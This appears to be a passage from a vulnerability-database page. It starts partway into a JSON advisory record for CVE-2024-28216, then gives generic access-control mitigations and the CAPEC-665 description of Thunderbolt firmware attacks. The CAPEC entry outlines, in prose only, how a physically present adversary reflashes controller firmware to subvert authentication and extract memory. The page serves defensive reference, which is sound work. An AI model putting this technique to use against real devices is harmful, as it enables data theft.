  "modified": "2024-08-12T21:31:32Z",
  "published": "2024-03-07T06:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28216"
    },
    {
      "type": "WEB",
      "url": "https://cve.naver.com/detail/cve-2024-28216.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design
  • Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
  • Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Architecture and Design

Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].

Mitigation MIT-4.4
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
Architecture and Design
  • For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
  • One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
System Configuration Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

CAPEC-665: Exploitation of Thunderbolt Protection Flaws

An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.